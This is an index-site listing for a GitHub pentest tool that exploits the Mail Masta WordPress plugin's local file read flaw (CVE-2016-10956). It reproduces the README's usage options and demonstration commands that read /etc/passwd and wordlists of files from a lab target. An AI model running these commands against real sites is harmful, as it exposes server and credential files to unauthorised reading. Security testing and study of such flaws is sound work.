Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/p0dalirius/cve-2016-10956-mail-masta
MailMasta wordpress plugin Local File Inclusion vulnerability (CVE-2016-10956)
https://github.com/p0dalirius/cve-2016-10956-mail-masta
cve-2016-10956 mailmasta pentest plugin tool vulnerability wordpress
Last synced: 18 days ago
JSON representation
MailMasta wordpress plugin Local File Inclusion vulnerability (CVE-2016-10956)
- Host: GitHub
- URL: https://github.com/p0dalirius/cve-2016-10956-mail-masta
- Owner: p0dalirius
- Created: 2021-12-10T16:06:46.000Z (almost 3 years ago)
- Default Branch: master
- Last Pushed: 2022-05-03T10:37:18.000Z (over 2 years ago)
- Last Synced: 2024-05-01T17:26:38.514Z (7 months ago)
- Topics: cve-2016-10956, mailmasta, pentest, plugin, tool, vulnerability, wordpress
- Language: Python
- Homepage: https://podalirius.net/
- Size: 2.08 MB
- Stars: 14
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
README
# Mail Masta - Local File Read (CVE-2016-10956)
The mail-masta plugin 1.0 for WordPress has local file read in `count_of_send.php` and `csvexport.php`.
## Usage
```
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)
usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]
Description message
optional arguments:
-h, --help show this help message and exit
-v, --verbose Verbose mode
-s, --only-success Only print successful read file attempts.
-t TARGET_URL, --target TARGET_URL
URL of the wordpress to connect to.
-f FILE, --file FILE Remote file to read.
-F FILELIST, --filelist FILELIST
File containing a list of paths to files to read remotely.
-D DUMP_DIR, --dump-dir DUMP_DIR
Directory where the dumped files will be stored.
-k, --insecure Allow insecure server connections when using SSL (default: False)
-r, --raw Raw dump of the file without php base64 wrapper (default: False)
```
## Demonstration
### Read a specific remote file
```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd
```
### Read specific remote files from a wordlist
```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist
```
### Read specific remote files from a wordlist and only printing found files
```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success
```
## References
- https://nvd.nist.gov/vuln/detail/CVE-2016-10956
- https://cxsecurity.com/issue/WLB-2016080220
- https://wordpress.org/plugins/mail-masta/#developers
- https://wpvulndb.com/vulnerabilities/8609